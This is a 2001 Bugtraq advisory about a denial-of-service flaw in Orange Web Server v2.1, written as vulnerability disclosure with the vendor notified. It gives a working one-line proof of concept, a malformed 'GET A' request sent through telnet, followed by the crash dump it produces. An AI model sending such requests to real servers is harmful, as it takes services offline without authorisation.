Bugtraq mailing list archives
Orange Web Server v2.1 DoS
From: slipy () B10Z NET
Date: Tue, 27 Feb 2001 04:50:46 -0000
Introduction: Orange Web Server v2.1 is a powerful yet light- weight web server that runs on all Windows platforms. Easy to setup and use, Orange Web Server can turn any PC into a web server. The httpd is based on GoAhead (c) Technology. The Vendors website is: http://www.orangesoftware.net/orangewebserver.html Problem: Denial of Service Attack Orange Web Server v2.1 is vulnerable to a very simple Denial of Service attack where its possible to cause the server to shut down at once and cause a invalid page fault. This is a very strange DoS, see example. Examples: echo "GET A" | telnet 192.168.0.20 80 ^^ = That simple echo & pipe will cause this: ORANGEWEBSERVER caused an invalid page fault in module ORANGEWEBSERVER.EXE at 016f:00409694. Registers: EAX=49703d50 CS=016f EIP=00409694 EFLGS=00010246 EBX=009dfe84 SS=0177 ESP=009dfbb8 EBP=009dfe8c ECX=00000000 DS=0177 ESI=00416362 FS=84cf EDX=00000000 ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP: f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24 Stack dump: 00416350 004094a7 00000000 00416350 ffffffff 009dfbf0 009dfe8c 009dfe84 00418644 ffffffff 006d8e8c 00410b62 00000000 00416350 006d949c 00000000 Solution: Vendor has been notified, and waiting for a reply. -------------------- b10z HTTPd Advisory slipy () b10z net Found: February 27th, 2001.
Current thread:
- Orange Web Server v2.1 DoS slipy (Feb 27)
- Re: Orange Web Server v2.1 DoS bert hubert (Feb 28)